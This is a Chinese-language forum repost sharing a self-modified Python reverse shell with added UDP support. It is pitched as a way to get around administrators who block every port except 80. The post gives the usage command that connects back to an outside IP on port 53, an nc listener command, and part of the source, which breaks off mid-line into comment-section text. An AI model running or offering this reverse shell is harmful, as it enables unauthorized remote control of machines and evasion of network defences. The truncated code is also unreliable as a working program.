自己改的python 反弹shell,加了UDP,放出来给大家分享
用来对付一些把除了80端口都封了的变态网管
用法 back.py 123.123.123.123 53 udp
nc监听:
nc -l 53 -u
后面不加udp的话还是默认的tcp
因为udp没有sequence的特性,当数据超过1个数据包的大小时会错位,具体多大会分包不太清楚,我记得是1500字节?好像和MTU有关。命令不要打太长就行了(一般情况下好像基本不会有1500个字符的命令)
其实就加了4行……
# -*- coding:utf-8 -*- #!/usr/bin/env python """ back connect py version,only linux have pty module code by google security team UDP by [email protected] """ import sys,os,socket,pty shell = "/bin/sh" def usage(name): print 'python reverse connector' print 'usage: %s[udp]' % name def main(): if len(sys.argv) 留言评论(旧系统):
文章来源于lcx.cc:python 反弹shell,加了UDP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论